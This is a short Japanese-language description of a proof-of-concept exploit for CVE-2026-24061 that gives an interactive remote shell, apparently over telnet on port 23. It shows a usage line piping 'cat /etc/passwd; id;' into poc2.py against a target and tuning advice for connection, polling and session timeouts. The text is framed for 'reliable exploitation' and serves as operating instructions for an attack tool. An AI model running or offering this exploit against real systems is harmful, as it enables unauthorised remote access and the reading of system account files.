
CVE-2026-24061の概念実証エクスプロイトで、設定可能なタイムアウトを備えた対話型リモートシェルセッションを提供し、信頼性の高い悪用を実現します。
echo "cat /etc/passwd; id;" | python poc2.py TARGET 23
python self.connection.settimeout(10) # <-- 調整可能な接続タイムアウト 目的: ターゲットへの初期TCP接続を待機する時間を制御します 推奨値:
高速ネットワーク: 5〜10秒
低速・不安定なネットワーク: 15〜30秒
デフォルト: 10秒
python ready_to_read, _, _ = select.select(read_fds, [], [], 5.0) # <-- 調整可能なポーリングタイムアウト 目的: アイドル時に受信データをチェックする頻度を制御します 推奨値:
対話型セッション: 1.0〜2.0秒
スクリプト自動化: 0.1〜0.5秒
デフォルト: 5.0秒
python session_timeout = 120 # <-- 調整可能な合計セッション時間 目的: エクスプロイトセッション全体の最大時間 推奨値:
クイックコマンド: 30〜60秒
ファイル転送・長時間操作: 300〜600秒
デフォルト: 120秒(2分)
